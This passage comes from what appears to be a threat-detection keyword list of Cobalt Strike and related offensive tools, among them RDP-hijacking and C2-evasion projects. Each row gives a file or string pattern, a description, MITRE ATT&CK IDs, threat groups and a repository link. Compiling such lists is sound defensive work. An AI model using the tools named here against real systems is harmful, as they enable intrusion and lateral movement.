- APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_inline_execute*","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" +"*beacon_log_clean*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*beacon_output_ps.cna*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*beacon_print*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" +"*BEACON_RDLL_*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_remote_exec_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_remote_exec_method_describe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 
- T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_remote_exec_method_register*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_remote_exec_methods*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team 
Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_remote_exploit*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_remote_exploit_arch*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_remote_exploit_describe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_remote_exploit_register*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_remote_exploits*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_smb.exe*","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. 
Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Beacon_Stage_p2_Stuct*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*beacon_stage_pipe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_stage_pipe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Beacon_Stage_Struct_p1*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*Beacon_Stage_Struct_p3*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*beacon_stage_tcp*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_stage_tcp*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 